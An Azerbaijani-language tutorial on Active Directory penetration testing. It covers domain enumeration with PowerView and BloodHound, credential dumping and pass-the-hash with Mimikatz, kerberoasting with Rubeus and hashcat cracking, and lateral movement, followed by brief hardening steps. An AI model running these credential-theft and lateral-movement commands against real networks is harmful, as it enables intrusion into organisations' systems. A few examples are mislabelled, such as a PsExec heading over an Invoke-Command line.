Active Directory Pentesti: Təhlükəsizlik və Hücum Metodları
1. Active Directory Nədir?
Active Directory (AD) Microsoft-un şəbəkə mühitində identifikasiya, autentifikasiya və avtorizasiya xidmətlərini idarə etmək üçün yaratdığı bir texnologiyadır. AD əsasən böyük təşkilatlarda istifadə olunur və istifadəçi hesablarını, kompüterləri, qrupları və digər resursları bir mərkəzdən idarə etməyə imkan verir.
Əsas komponentlər:
- Domain Controller (DC) – AD-nin əsas serveri, istifadəçi məlumatlarını və təhlükəsizlik siyasətlərini saxlayır.
- Kerberos Authentication – AD daxilində autentifikasiya üçün istifadə olunan protokol.
- LDAP (Lightweight Directory Access Protocol) – Məlumat bazasına giriş üçün istifadə edilən protokol.
- Group Policy Objects (GPO) – İstifadəçi və cihaz siyasətlərini idarə edir.
2. Active Directory Pentesti Üçün Əsas Hücumlar
Active Directory infrastrukturu müxtəlif hücum vektorlarına qarşı həssasdır. Burada əsas hücum metodlarını və onların istismar üsullarını izah edirik.
2.1. Domain Enumeration (Məlumat Toplama)
PowerView və BloodHound kimi alətlər AD infrastrukturu haqqında məlumat toplamaq üçün istifadə olunur.
PowerView ilə Domain Enumeration
# Domain istifadəçilərini əldə etmək
Get-NetUser
# Domain qruplarını yoxlamaq
Get-NetGroup
# Domain controller-ları əldə etmək
Get-NetDomainController
BloodHound ilə Domain Enumeration
neo4j console & # BloodHound üçün Neo4j bazasını işə salırıq
bloodhound & # BloodHound interfeysini açırıq
BloodHound, şəbəkədəki zəiflikləri vizuallaşdırmağa və istismar yollarını müəyyən etməyə imkan verir.
2.2. Pass-the-Hash (PtH) Hücumu
Hesabın şifrəsini bilmədən NTLM hash-lə autentifikasiya olunmağa imkan verir.
Mimikatz ilə Pass-the-Hash
mimikatz
sekurlsa::logonpasswords
sekurlsa::pth /user:Administrator /domain:example.local /ntlm:<NTLM Hash>
Bununla, NTLM hash istifadə edərək autentifikasiya olunmaq mümkündür.
2.3. Kerberoasting Hücumu
Kerberoasting, AD-də xidmət hesablarının zəif şifrələnmiş biletlərini əldə edib qırmağa çalışmaq üçün istifadə olunur.
Rubeus ilə Kerberoasting
Rubeus.exe kerberoast /nowrap
Elde edilen şifrəli məlumatlar Hashcat ilə qırıla bilər:
hashcat -m 13100 -a 0 hash.txt wordlist.txt
2.4. Lateral Movement (Yatay Hərəkət)
Hücumçular bir maşından digərinə keçmək üçün “Lateral Movement” metodlarından istifadə edirlər.
PsExec ilə Yatay Hərəkət
Invoke-Command -ComputerName "target-PC" -Credential $cred -ScriptBlock { whoami }
RDP ilə Yatay Hərəkət
xfreerdp /u:user /p:password /v:target-IP
3. Active Directory Təhlükəsizliyinin Gücləndirilməsi
3.1. İstifadəçi Hüquqlarının Minimuma Endirilməsi
- Administrator hesablarından gündəlik istifadəni məhdudlaşdırmaq.
- Lazımsız domain administratorlarını silmək.
3.2. NTLM və LM Hash-lərin Saxlanılmasının Qarşısının Alınması
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'NoLMHash' -Value 1
3.3. Kerberos Konfiqurasiyasını Gücləndirmək
- Güclü şifrə siyasətlərini tətbiq etmək.
- Kerberos biletlərinin müddətini məhdudlaşdırmaq.
Set-ADDefaultDomainPasswordPolicy -Identity "example.local" -MaxPasswordAge 30
4. Nəticə
Active Directory pentesti böyük təşkilatların təhlükəsizlik zəifliklərini aşkar etmək və qoruma tədbirləri görmək üçün vacibdir. Bu məqalədə AD hücum metodlarını və onların qarşısını alma yollarını izah etdik. AD-nin təhlükəsizliyini gücləndirmək üçün müntəzəm auditlər və düzgün konfiqurasiyalar tətbiq edilməlidir.